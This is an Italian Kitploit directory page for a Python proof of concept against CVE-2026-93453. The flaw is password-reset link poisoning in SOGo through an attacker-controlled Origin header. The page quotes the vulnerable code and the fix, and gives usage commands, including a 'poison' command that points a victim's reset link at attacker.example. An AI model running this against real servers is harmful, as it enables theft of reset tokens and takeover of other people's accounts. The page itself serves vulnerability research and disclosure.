Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-93453 — PoC Python per CVE-2026-93453, una vulnerabilità di avvelenamento del link di reset della password di SOGo tramite header Origin controllato dall'attaccante che consente l'intercettazione del token di reset e il takeover dell'account. | Kitploit
Strumenti/GitHubGitHub/faceless0x7/cve-2026-93453
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingAutenticazioneRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
faceless0x7/cve-2026-93453

CVE-2026-93453

PoC Python per CVE-2026-93453, una vulnerabilità di avvelenamento del link di reset della password di SOGo tramite header Origin controllato dall'attaccante che consente l'intercettazione del token di reset e il takeover dell'account.

Vedi Repository
1110h 46m faNon ancora revisionato

CVE-2026-93453 — Avvelenamento del link di reset password di SOGo tramite header Origin

Un exploit per una vulnerabilità in cui SOGo costruisce il link di reset password inviato via email agli utenti direttamente dall'header Origin fornito dal client. Un attaccante anonimo che conosce il login di una vittima invia una richiesta di recupero con un Origin controllato; il link all'interno del messaggio email "Password reset" punta quindi all'host dell'attaccante mentre il JWT incorporato rimane un token di recupero perfettamente valido. Un click della vittima dopo, il token è nel log di accesso dell'attaccante, e POST /SOGo/changePassword lo scambia con una nuova password — takeover completo dell'account di mail, calendari e contatti, senza autenticazione in nessun passaggio. Il ramo email salta inoltre il controllo SOGoPasswordRecoveryEnabled (quel flag viene consultato solo nel ramo SecretQuestion), quindi il vettore email funziona anche quando l'operatore pensa che il recupero sia disattivato.

Record: https://www.cve.org/CVERecord?id=CVE-2026-93453

AffectedSOGo < 5.12.11 (≤ 5.12.10)
Fixed5.12.11 (SOGoPasswordRecoveryBaseURLs allowlist)
Prerequisitesvittima con modalità di recupero SecondaryEmail; l'attaccante conosce lo userName; la vittima clicca il link inviato via email
Impacttakeover dell'account

Causa principale

root@kitploit:~
// UI/MainUI/SOGoRootPage.m:1374 (tag SOGo-5.12.10) — passwordRecoveryEmailAction
url = [NSString stringWithFormat:@"%@%@?token=%@",
          [[request headers] objectForKey:@"origin"],   // <-- raw client header
          [request uri],
          jwtToken];                                    // <-- valid HS256 JWT, 10 min TTL

L'URL di reset tokenizzato è Origin + request URI + JWT, quindi chiunque imposti l'header imposta l'host verso cui viaggia il segreto della vittima. Questo è avvelenamento del reset password (CWE-640 / CWE-601), non un open redirect: il JWT viene accettato da /SOGo/changePassword indipendentemente da quale host lo abbia trasportato.

root@kitploit:~
// 5.12.11 — the fix: origins are validated against a mandatory allowlist
baseUrls = [[SOGoSystemDefaults sharedSystemDefaults] passwordRecoveryBaseURLs];
serverUrl = [[request headers] objectForKey:@"origin"];
if (!(baseUrls && [baseUrls count] > 0))          // unset config -> 403
if (![baseUrls containsObject:serverUrl])          // foreign origin -> 403

Su 5.12.11 un Origin estraneo riceve un 403 ("Password recovery email in error"); su ≤ 5.12.10 la stessa richiesta restituisce 200 e la mail viene inviata — questa differenza è ciò su cui si basa check.

Utilizzo

root@kitploit:~
# non-destructive probe: canary user + foreign Origin, classify the reply
python3 CVE-2026-93453.py check https://sogo.example

# poison: dispatch the reset mail for the victim with your host in the link
python3 CVE-2026-93453.py poison https://sogo.example --user victim --origin https://attacker.example

Solo libreria standard (Python 3.8+). Supporta --proxy, --insecure, --timeout, --no-color, e --prefix per mount point SOGo non standard.

Il PoC non necessita di infrastruttura dell'attaccante: poison fa solo inviare al server il link via email, e l'host avvelenato è quello che inserisci in --origin. Su un'istanza vulnerabile il link inviato via email diventa https://attacker.example/SOGo/passwordRecoveryEmail?token=<valid HS256 JWT> — il token viaggia verso il tuo host nel momento in cui la vittima clicca.

check usa un username canary inesistente, quindi nessuna email viene mai consegnata a una casella reale; 200 = il ramo email ha accettato l'Origin estraneo (firma vulnerabile), 403 = allowlist 5.12.11 o SOGoPasswordRecoveryBaseURLs non impostato (non sfruttabile). Per un self-test definitivo, esegui poison su un account che possiedi e leggi l'host del link nella tua casella di posta.

Riferimenti

  • CVE record: https://www.cve.org/CVERecord?id=CVE-2026-93453
  • Fixed release: https://github.com/Alinto/sogo/releases/tag/SOGo-5.12.11
  • Fix commits:
    • https://github.com/Alinto/sogo/commit/382118a93b6925de2ce7f774abc1865ebea2dbba
    • https://github.com/Alinto/sogo/commit/04a3e9823889acaf6c247b224f5f7a0108f8f829
  • Vulnerable source: https://github.com/Alinto/sogo/blob/SOGo-5.12.10/UI/MainUI/SOGoRootPage.m (passwordRecoveryEmailAction)

Disclaimer

Solo per test e ricerca autorizzati. Utilizzare esclusivamente contro sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione al test.

Scarica lo strumento